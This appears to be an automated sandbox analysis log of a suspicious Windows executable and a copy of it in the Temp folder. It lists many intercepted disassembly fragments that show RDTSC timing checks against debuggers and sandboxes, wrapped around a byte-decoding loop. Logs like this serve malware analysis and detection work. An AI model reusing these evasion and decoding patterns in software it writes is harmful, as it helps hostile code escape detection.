Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403C72 second address: 0000000000403C92 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Eh 0x00000009 popad 0x0000000a popfd 0x0000000b push 00404779h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403C92 second address: 0000000000403C98 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403C98 second address: 0000000000403CB7 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Dh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ebx, 00403FA9h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403CB7 second address: 0000000000403CBD instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403CBD second address: 0000000000403FB0 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b call ebx 0x0000000d push ebp 0x0000000e mov ebp, esp 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403FB0 second address: 0000000000403FB6 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403FB6 second address: 0000000000403FD3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b push ecx 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403FD3 second address: 0000000000403FD9 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403FD9 second address: 0000000000403FFC instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000403FFC second address: 0000000000404002 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000404002 second address: 0000000000404029 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC883h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000404029 second address: 000000000040402F instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 000000000040402F second address: 0000000000404109 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC883h 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007FA684CEC92Ah 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000404109 second address: 000000000040410F instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 000000000040410F second address: 0000000000404137 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp-04h] 0x0000000e cmp ecx, dword ptr [ebp+0Ch] 0x00000011 jnc 00007FA684CECA8Dh 0x00000017 pushfd 0x00000018 pushad 0x00000019 xor ecx, ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000404137 second address: 000000000040413D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 000000000040413D second address: 0000000000404161 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC884h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000404161 second address: 0000000000404167 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000404167 second address: 000000000040417F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC879h 0x00000009 popad 0x0000000a popfd 0x0000000b xor edx, edx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 000000000040417F second address: 0000000000404185 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000404185 second address: 00000000004041A9 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC884h 0x00000009 popad 0x0000000a popfd 0x0000000b div dword ptr [ebp+14h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 00000000004041A9 second address: 00000000004041AF instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 00000000004041AF second address: 00000000004041D6 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC887h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp+10h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 00000000004041D6 second address: 00000000004041DC instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 00000000004041DC second address: 00000000004041F9 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Ch 0x00000009 popad 0x0000000a popfd 0x0000000b movsx ecx, byte ptr [eax+edx] 0x0000000f pushfd 0x00000010 pushad 0x00000011 xor ecx, ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 00000000004041F9 second address: 00000000004041FF instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 00000000004041FF second address: 0000000000404223 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC884h 0x00000009 popad 0x0000000a popfd 0x0000000b mov edx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000404223 second address: 0000000000404229 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000404229 second address: 0000000000404245 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Ch 0x00000009 popad 0x0000000a popfd 0x0000000b add edx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000404245 second address: 000000000040424B instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 000000000040424B second address: 000000000040426A instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b movzx eax, byte ptr [edx] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 000000000040426A second address: 0000000000404270 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000404270 second address: 000000000040428F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC880h 0x00000009 popad 0x0000000a popfd 0x0000000b sub eax, ecx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 000000000040428F second address: 0000000000404295 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000404295 second address: 00000000004042B3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Eh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 00000000004042B3 second address: 00000000004042B9 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 00000000004042B9 second address: 00000000004042D8 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b add ecx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 00000000004042D8 second address: 00000000004042DE instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 00000000004042DE second address: 0000000000404300 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC883h 0x00000009 popad 0x0000000a popfd 0x0000000b mov byte ptr [ecx], al 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000404300 second address: 0000000000404306 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000404306 second address: 0000000000404079 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007FA684CEC5C7h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 0000000000404079 second address: 000000000040407F instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 000000000040407F second address: 000000000040409B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Ch 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 000000000040409B second address: 00000000004040A1 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 00000000004040A1 second address: 00000000004040C1 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC880h 0x00000009 popad 0x0000000a popfd 0x0000000b add eax, 01h 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 00000000004040C1 second address: 00000000004040C7 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 00000000004040C7 second address: 00000000004040E8 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC881h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], eax 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 00000000004040E8 second address: 00000000004040EE instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 00000000004040EE second address: 0000000000404109 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Eh 0x00000009 popad 0x0000000a popfd 0x0000000b pushfd 0x0000000c pushad 0x0000000d xor ecx, ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe RDTSC instruction interceptor: First address: 000000000040434E second address: 0000000000404354 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403BD4 second address: 0000000000403BDA instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403BDA second address: 0000000000403BFC instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C53h 0x00000009 popad 0x0000000a popfd 0x0000000b push 00000005h 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403BFC second address: 0000000000403C02 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403C02 second address: 0000000000403C23 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, 00403F45h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403C23 second address: 0000000000403C29 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403C29 second address: 0000000000403C43 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Ch 0x00000009 popad 0x0000000a popfd 0x0000000b push eax 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403C43 second address: 0000000000403C49 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403C49 second address: 0000000000403C6C instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C51h 0x00000009 popad 0x0000000a popfd 0x0000000b push 000013C5h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403C6C second address: 0000000000403C72 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403C72 second address: 0000000000403C92 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Eh 0x00000009 popad 0x0000000a popfd 0x0000000b push 00404779h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403C92 second address: 0000000000403C98 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403C98 second address: 0000000000403CB7 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Dh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ebx, 00403FA9h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403CB7 second address: 0000000000403CBD instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403CBD second address: 0000000000403FB0 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Fh 0x00000009 popad 0x0000000a popfd 0x0000000b call ebx 0x0000000d push ebp 0x0000000e mov ebp, esp 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403FB0 second address: 0000000000403FB6 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403FB6 second address: 0000000000403FD3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Fh 0x00000009 popad 0x0000000a popfd 0x0000000b push ecx 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403FD3 second address: 0000000000403FD9 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403FD9 second address: 0000000000403FFC instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403FFC second address: 0000000000404002 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404002 second address: 0000000000404029 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C53h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404029 second address: 000000000040402F instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 000000000040402F second address: 0000000000404109 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C53h 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007FA684D71CFAh 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404109 second address: 000000000040410F instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 000000000040410F second address: 0000000000404137 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp-04h] 0x0000000e cmp ecx, dword ptr [ebp+0Ch] 0x00000011 jnc 00007FA684D71E5Dh 0x00000017 pushfd 0x00000018 pushad 0x00000019 xor ecx, ecx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404137 second address: 000000000040413D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 000000000040413D second address: 0000000000404161 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C54h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404161 second address: 0000000000404167 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404167 second address: 000000000040417F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C49h 0x00000009 popad 0x0000000a popfd 0x0000000b xor edx, edx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 000000000040417F second address: 0000000000404185 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404185 second address: 00000000004041A9 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C54h 0x00000009 popad 0x0000000a popfd 0x0000000b div dword ptr [ebp+14h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004041A9 second address: 00000000004041AF instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004041AF second address: 00000000004041D6 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C57h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp+10h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004041D6 second address: 00000000004041DC instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004041DC second address: 00000000004041F9 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Ch 0x00000009 popad 0x0000000a popfd 0x0000000b movsx ecx, byte ptr [eax+edx] 0x0000000f pushfd 0x00000010 pushad 0x00000011 xor ecx, ecx 0x00000013 rdtsc
